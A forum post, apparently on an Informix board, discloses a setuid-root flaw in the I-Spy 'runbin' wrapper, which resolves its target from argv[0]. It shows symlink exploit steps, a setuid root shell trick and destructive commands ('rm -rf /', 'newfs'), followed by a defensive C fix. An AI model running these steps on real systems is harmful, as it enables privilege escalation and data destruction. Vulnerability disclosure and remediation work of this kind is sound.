This is a discussion on BIG INFORMIX I-SPY SECURITY HOLE within the Informix forums, part of the Database Server Software category.
Install i-spy into /opt/ispy... you get directories /opt/ispy/bin and /opt/ispy/realbin... and /opt/ispy/runbin which is setuid root....hmmm runbin eh?

strings runbin shows that it calls execv()....hmmm even worse!

    ln -s /opt/ispy/bin/runbin /tmp/djw/ls
    /tmp/djw/ls
    execv() of [/tmp/bin/realbin/ls] failed, errno 2

so it uses argv[0] to get the relative directory to use and is fooled by links?? So running /tmp/djw/ls does an execv() of /tmp/bin/realbin/ls and runbin is setuid root so...

    cp `whence id` /tmp/bin/realbin/ls
    /tmp/djw/ls
    uid=...gid=...euid=0(root)...
                  ^^^^^^^^^^

so making /tmp/bin/realbin/ls a C program which does

- cp /bin/sh /tmp/.hacked; chown root /tmp/.hacked; chmod 4775 /tmp/.hacked gives a root shell!!
- rm -rf /
- newfs <rootfs>

etc etc etc...

Welcome to the sos zone..you've been hacked!!
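The root cause described in the post is a setuid wrapper that derives its exec directory from argv[0]. The sketch below is an added example, not code from the post or from Informix, showing a wrapper lookup that ignores the directory part of argv[0]; the function names are hypothetical and REALBIN_DIR assumes the install path the post mentions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumption: the real binaries live in the install path named in the post. */
#define REALBIN_DIR "/opt/ispy/realbin"
#define NAME_CHARS "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-"

/* Build the exec path from a compiled-in directory plus the bare command
 * name. The directory part of argv[0] is caller-controlled (symlinks, or any
 * string passed to exec), so it is discarded. Returns 0 on success, -1 if
 * the name is rejected or does not fit. */
int resolve_target(const char *argv0, char *out, size_t outlen)
{
    if (argv0 == NULL || out == NULL)
        return -1;
    const char *name = strrchr(argv0, '/');
    name = name ? name + 1 : argv0;
    if (*name == '\0' || strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return -1;
    if (strspn(name, NAME_CHARS) != strlen(name))
        return -1;
    int n = snprintf(out, outlen, "%s/%s", REALBIN_DIR, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Only a regular file owned by root that group/other cannot write is
 * acceptable; lstat() means a symlink planted at the path is refused. */
int target_is_trusted(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == 0 &&
           (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

int main(int argc, char **argv)
{
    char path[4096];
    if (argc < 1 || resolve_target(argv[0], path, sizeof path) != 0 ||
        !target_is_trusted(path)) {
        fprintf(stderr, "refusing to run\n");
        return 126;
    }
    execv(path, argv);
    perror("execv");
    return 127;
}
```

The ownership check is only meaningful if REALBIN_DIR and every parent directory are themselves root-owned and not writable by others.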